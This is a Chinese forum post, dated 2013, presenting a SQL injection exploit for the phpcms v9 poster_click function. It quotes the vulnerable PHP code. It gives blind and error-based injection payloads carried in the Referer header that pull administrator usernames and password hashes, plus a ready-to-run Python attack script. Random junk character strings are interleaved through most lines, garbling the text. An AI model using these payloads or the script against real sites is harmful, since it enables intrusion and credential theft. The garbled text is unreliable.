有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
7 m; ~* G. q. K. i' e: G+ F& t, Y7 F& e; D& i9 s Z6 H: {' Q
问题函数\phpcms\modules\poster\index.php0 p( g" `% [, ~) D) i
1 e6 k% O: P* V" r/ w6 Q2 j
public function poster_click() {
0 F- q. g" T1 f6 s$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
: d) y! B* [. s! f& l7 l4 g$r = $this->db->get_one(array('id'=>$id));7 o1 `, C# _3 m( w& Q+ }
if (!is_array($r) && empty($r)) return false;
/ n, v2 I' k* k' Q# ]$ip_area = pc_base::load_sys_class('ip_area');
" f3 e- y3 O& V2 s; L4 S$ip = ip();
- d: [: ~" [& N: H+ B: y% W8 j$area = $ip_area->get($ip);$ c( x/ n1 J$ K; M3 a& W
$username = param::get_cookie('username') ? param::get_cookie('username') : '';# Q' P; J$ I( [3 y+ u1 V, d
if($id) {
' a# t: @. P% O) b$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
) y; i7 i, A% ~0 z1 G& y- H$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));# K! m0 P: d; D5 C7 U; B4 Q ?
}+ E }: {8 _2 l/ l3 E
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
* Z& G2 e) v; \5 W: F1 o$setting = string2array($r['setting']);
, ~6 r7 V. }1 A# R6 Iif (count($setting)==1) {
" u/ L' J, J+ k2 x" _ P8 }' ^! `$url = $setting['1']['linkurl'];
N% s$ S4 i* B7 {- @} else {# U8 V1 Q3 S7 D
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
+ z- S s" l6 _}
: ?0 G+ H: t1 T. g, x0 |0 Sheader('Location: '.$url);
i5 c x9 Y# V5 x% O2 q}
- Z7 f- m! u, l& ?& e% v0 Z4 |& C, @/ s) \8 T$ g
/ c* j4 b3 n4 A2 o# k8 X/ Y% ^
+ ]: o/ v; ~; `6 I; L) |
利用方式:2 J" s; Y, o% J9 P. Q) w8 O7 N+ ?4 H
! {4 f$ k+ z; G- u/ ?% k4 [1、可以采用盲注入的手法:! m f; _2 o8 ~ I, O! S. A
+ q( O6 ^+ H# ~
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
+ h& `! y' S$ T/ H
, o0 p) y3 A5 a$ ~通过返回页面,正常与否一个个猜解密码字段。
' Y) m+ o/ s0 q/ V0 T% S4 r
# B* C# c, Q* m) N! H" Y2、代码是花开写的,随手附上了:0 ?* }, ^! }/ v# @
4 H- ~5 q$ A. t" {4 m- U: U1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
3 o7 _* v8 H9 G; P! O H3 p) e8 O
此方法是爆错注入手法,原理自查。& q5 A4 C0 l: s! Y, t& _
# { T, E3 L- y! v+ U: Y
* h% m8 u# G- D
7 t! x6 y/ C# G' q8 Y( l利用程序:
5 I n E" }. @5 e6 k/ j9 l% ?7 `* H5 _& C, V& R) e k1 b
#!/usr/bin/env python
# u0 h5 D6 I0 w+ Y8 c9 M* J( iimport httplib,sys,re
, |; @" S3 m9 c0 D3 }* g/ a3 G
def attack():
1 n$ p) E n3 }print “Code by Pax.Mac Team conqu3r!”$ k! y' j- J7 n/ `+ m: h5 C, N
print “Welcome to our zone!!!”2 l4 d2 ^/ c% K6 {- e' Q
url=sys.argv[1]- Y5 V, ?$ X2 q% r, E; Q5 x* o
paths=sys.argv[2]
, y: ]7 C$ f- K5 U. @+ J1 [conn = httplib.HTTPConnection(url)
- i% C4 l, t; w6 m3 d. Ii_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,. Q2 p4 p: |5 ]! v, @& Q5 }
“Accept”: “text/plain”,
* S5 R: `4 k9 x& Z0 h* C# P“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
9 A* h0 R* A- N" C ~conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
\, n' d0 M' w% d9 W& Qr1 = conn.getresponse()6 _4 ~' B7 K5 V; t( g5 L8 F! Y
datas=r1.read()
. T0 V, t$ p5 |% Q$ Hdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
# B! d, I+ I! [1 S' A; Aprint datas[0]% O2 u i8 g$ q+ C
conn.close()
7 ]. b5 H7 I7 c+ Mif __name__==”__main__”:
% B% s+ c! m2 p. d$ f& E- R; tif len(sys.argv)<3:0 y( G$ A) j. C6 c! I( M' h
print “Code by Pax.Mac Team conqu3r”
7 A- W4 c9 M) }- y; zprint “Usgae:”
( X; N2 v" O H* Z: z/ T/ ~: Pprint “ phpcmsattack.py www.paxmac.org /”
) J' ]* _: G% k% ]$ rprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
8 h, Z6 o$ b( B Asys.exit(1); Q( z+ J) Z3 W
attack()& p& x. |: p" F9 B- j* Z& w
( \& R* D+ }5 Z0 R( Y, P8 M, Z' Q, I
|
发表于 2013-1-11 21:01:00
收藏
支持
反对